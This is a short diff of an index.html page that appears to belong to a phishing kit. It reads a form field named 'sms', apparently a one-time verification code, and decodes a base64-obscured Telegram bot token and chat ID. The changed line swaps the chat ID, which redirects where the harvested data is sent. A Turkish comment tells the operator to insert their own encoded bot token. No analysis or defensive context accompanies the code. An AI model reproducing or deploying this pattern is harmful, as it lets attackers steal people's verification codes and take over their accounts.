--- a/index.html
+++ b/index.html
@@ -270,7 +270,7 @@
                                                             var sms = document.getElementById('sms').value;
                                                 
                                                             var botTokenBase64 = 'Njg5Mjc1Mzg1MzpBQUd6b1Q1MUpMTD5gd7ha1umXtjjh1YnhaFiintUbdZGRAX=='; // Buraya Base64 ile kodlanmış botToken ekleyin
-                                                            var chatIdBase64 = 'Njg5Mjc1Mzg1Mw==';
+                                                            var chatIdBase64 = 'NTU0NjI0Njc3Ng==';
                                                 
                                                             var botToken = atob(botTokenBase64);
                                                             var chatId = atob(chatIdBase64);
